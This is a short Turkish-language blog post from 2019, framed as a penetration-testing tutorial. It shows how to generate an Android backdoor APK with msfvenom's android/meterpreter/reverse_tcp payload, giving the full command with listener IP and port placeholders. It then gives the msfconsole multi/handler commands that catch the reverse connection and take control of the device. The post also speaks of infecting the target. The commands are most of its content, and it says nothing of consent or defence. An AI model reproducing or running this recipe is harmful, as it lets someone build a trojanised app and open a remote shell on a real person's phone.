Newest Post

// On :10 Haziran 2019 Pazartesi

Bu çalışmada msfconsole ve msfvenom kullanacağız. Bazı tanımlar var bunlara kısaca bahsedip geçeceğim. Sızma testi için bu tanımlar önemlidir.

Tanımlar :

A.Msfvenom

Hedef sistemin özelliklerine göre özelleştirilmiş backdoor oluşturma aracıdır.

B.Metasploit

Sunucu , web uygulamaları ve bilgi toplamada kullanılan bu çok işlevli araç sayesinde kullanacağımız rolü backconnect alıp , android payload ile daha sağlıklı bir şekilde cihazdan faydalanacağız.

C.Ağ

İki veya daha fazla teknolojik aletin birbiriyle iletişim kurmasını sağlayan bağlantıdır.Sızma testindeki rolü tersine bağlantı alma ve virüsü bulaştırmak için indirme/yükleme işlemlerini gerçekleştirmesidir.

Msfvenom

Aşağıda bir msfvenom ve menü çıktısı vardır program terminal üzerinden kullanılır. GUI veya görüntüsel bir işlevi yoktur.




Kullanacağımız Payload Reverse TCP bağlantısını kullanarak yapacağımız için ;

msfvenom –p android/meterpreter/reverse_tcp LHOST=BağlantıVerilecekIP LPORT=BağlantıVerilecekPORT R > /root/Desktop/dosyaismi.apk

Açıklama :

Android cihaz üzerinde sızma yapacağımız için payloadı
(-p) android/meterpreter/ belirledik.
Reverse_tcp yazmamızın amacı ise tersine bağlantı alırken tcp yöntemini kullanacağımız için.
LHOST= Dinleme yaptığınız ip.
LPORT= Tcp üzerinden alacağınız port numarası kapı açıp kullanabilmek için.
R > Dosyayı çıkar → Nereye → /root/Desktop/buraya.apk




Kullanıcı burada exploit ve payload belirleyip sızma testi yapmaktadır.

Android için kullanılan msfconsole komutları :

use exploit/multi/handler

set Payload android/meterpreter/reverse_tcp

ve son olarak exploit komutu ile exploitini çalıştırır.

Eğer doğru bağlantılar ve zemin sağlandıysa cihazda yetkili kişi haline gelir.

Leave a Reply

Subscribe to Posts | Subscribe to Comments

// Copyright © WELCOME Se☪uЯity Candidate //Anime-Note//Powered by Blogger // Designed by Johanes Djogan //